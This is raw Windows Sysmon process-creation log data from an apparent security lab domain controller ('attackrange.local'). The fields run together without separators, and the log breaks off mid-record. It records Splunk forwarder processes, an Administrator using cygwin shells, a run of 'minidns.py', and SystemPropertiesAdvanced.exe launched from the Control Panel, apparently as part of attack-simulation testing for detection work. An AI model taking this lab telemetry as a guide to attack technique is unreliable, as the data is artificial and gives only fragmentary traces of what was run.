AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060767Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:01:22.829{A8622C2F-5542-6078-0D0D-00000000AE01}3420C:\Windows\System32\SystemPropertiesAdvanced.exe10.0.14393.0 (rs1_release.160715-1616)Advanced System SettingsMicrosoft® Windows® Operating SystemMicrosoft CorporationSystemPropertiesAdvanced.EXE"C:\Windows\system32\systempropertiesadvanced.exe" C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=167BD51C53D3972B0F7EFB1ABA6FB207,SHA256=0AA8C07A382405ED6C58EED6656592E3319811B38A819FA6530C8EA92D3BE313,IMPHASH=F645D3540F34B60C2EDF081815969E40{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000060715Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:01:20.892{A8622C2F-5540-6078-090D-00000000AE01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060696Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:01:20.448{A8622C2F-5540-6078-080D-00000000AE01}5828C:\Windows\SysWOW64\dllhost.exe10.0.14393.0 (rs1_release.160715-1616)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=6046950FC9CA5B7A7E084C189658DACB,SHA256=5137C324038AB2E8EAB4F98A20BEE9F121346D62E4D907CA1E4A860F4C54EAE8,IMPHASH=EC90A0D780E0DD23BA7910ABD6BF7E32{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x800000000000000060686Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:01:20.420{A8622C2F-5540-6078-070D-00000000AE01}928C:\Windows\System32\control.exe10.0.14393.0 (rs1_release.160715-1616)Windows Control PanelMicrosoft® Windows® Operating SystemMicrosoft CorporationCONTROL.EXE"C:\Windows\system32\control.exe" SYSTEMC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=924219B426830FF7476AF7D22AE91DE1,SHA256=CB089C50698BEE280244437BCAF56D3955402A582E5E928DBC8812A5D9C0EF4D,IMPHASH=EA468570E9A3DEDC296C3D5DECEA9AA6{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000060677Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:01:20.220{A8622C2F-5540-6078-060D-00000000AE01}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060665Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:01:19.547{A8622C2F-553F-6078-050D-00000000AE01}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060647Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:01:17.594{A8622C2F-553D-6078-040D-00000000AE01}2104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060637Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:01:16.939{A8622C2F-553C-6078-030D-00000000AE01}1476C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060627Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:01:16.270{A8622C2F-553C-6078-020D-00000000AE01}3904C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060591Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:01:06.271{A8622C2F-5532-6078-010D-00000000AE01}6836C:\cygwin64\bin\which.exe-----"C:\cygwin64\bin\which.exe"C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=1EF23A8281E59922767204E07E30FE0A,SHA256=3449172DD849D69808291F5B2E51C96CEBDCCE47C5557B6DE1C44F48A8AAE1B0,IMPHASH=798C2BA85391CE6B62F71807EB04AD4A{A8622C2F-5532-6078-000D-00000000AE01}5516C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000060573Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:01:06.260{A8622C2F-5532-6078-000D-00000000AE01}5516C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000060365Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:00:22.852{A8622C2F-5506-6078-FD0C-00000000AE01}5276C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060350Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:00:20.792{A8622C2F-5504-6078-FC0C-00000000AE01}5496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060338Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:00:20.203{A8622C2F-5504-6078-FB0C-00000000AE01}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060329Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:00:19.536{A8622C2F-5503-6078-FA0C-00000000AE01}932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060313Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:00:17.435{A8622C2F-5501-6078-F90C-00000000AE01}6020C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060304Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:00:16.923{A8622C2F-5500-6078-F80C-00000000AE01}6492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060291Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:00:16.256{A8622C2F-5500-6078-F70C-00000000AE01}5628C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060277Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:00:15.932{A8622C2F-54FF-6078-F60C-00000000AE01}2112C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exe"C:\Program Files\Python38\python.exe" --versionC:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-54FF-6078-F50C-00000000AE01}4596C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000060258Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:00:15.922{A8622C2F-54FF-6078-F50C-00000000AE01}4596C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000060228Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:00:08.467{A8622C2F-54F8-6078-F40C-00000000AE01}2952C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-54F8-6078-F30C-00000000AE01}4940C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000060210Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:00:08.457{A8622C2F-54F8-6078-F30C-00000000AE01}4940C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000060159Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:54.907{A8622C2F-54EA-6078-F20C-00000000AE01}4268C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exe"C:\Program Files\Python38\python.exe" c:tempminidns.pyC:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-54EA-6078-F10C-00000000AE01}5008C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000060141Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:54.896{A8622C2F-54EA-6078-F10C-00000000AE01}5008C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000060088Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:41.007{A8622C2F-54DD-6078-F00C-00000000AE01}3500C:\cygwin64\bin\dir.exe-----"C:\cygwin64\bin\dir.exe"C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CB1A7D2EE275FCA2B1FCC408145D8D97,SHA256=84A649A70A36BDF0F8ADFA940DBCCDB2DD1FCD2FFA9AE4F370DBECC9BAAF940B,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-54DC-6078-EF0C-00000000AE01}6112C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000060070Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:40.997{A8622C2F-54DC-6078-EF0C-00000000AE01}6112C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000060012Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:29.377{A8622C2F-54D1-6078-EE0C-00000000AE01}6460C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059954Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:22.840{A8622C2F-54CA-6078-ED0C-00000000AE01}1996C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059940Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:20.868{A8622C2F-54C8-6078-EC0C-00000000AE01}5928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059929Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:20.195{A8622C2F-54C8-6078-EB0C-00000000AE01}5148C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059907Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:19.958{A8622C2F-54C7-6078-EA0C-00000000AE01}1332C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059898Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:19.523{A8622C2F-54C7-6078-E90C-00000000AE01}5792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059882Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:17.631{A8622C2F-54C5-6078-E80C-00000000AE01}6672C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059871Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:17.014{A8622C2F-54C5-6078-E70C-00000000AE01}5700C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059862Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:16.383{A8622C2F-54C4-6078-E60C-00000000AE01}5904C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059757Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:48.053{A8622C2F-54A8-6078-E50C-00000000AE01}5276C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exe"C:\Program 